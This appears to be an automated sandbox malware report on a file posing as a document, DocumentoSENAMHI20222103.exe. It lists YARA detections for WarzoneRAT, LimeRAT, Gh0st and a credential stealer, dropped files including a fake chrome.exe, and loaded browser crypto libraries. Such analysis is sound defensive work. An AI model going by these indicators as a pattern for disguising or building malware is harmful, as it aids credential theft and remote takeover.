                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                      Source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                      Source: 18.3.chrome.exe.3e7cd10.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 18.3.chrome.exe.3e7cd10.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                      Source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                      Source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 18.3.chrome.exe.3e8812f.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                      Source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 18.2.chrome.exe.53f0000.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 18.3.chrome.exe.3e81c45.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 18.2.chrome.exe.53d0000.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                      Source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 00000001.00000002.83503482474.00000000014EF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPEDMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPEDMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPEDMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: String function: 00BD4730 appears 34 times
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81070018910.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80844565838.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80842292045.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81070163110.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81069901900.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83512915307.0000000005613000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80845816715.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81073154674.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83508026711.00000000047E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81066835085.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80842539174.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000000.78446193953.0000000000D13000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
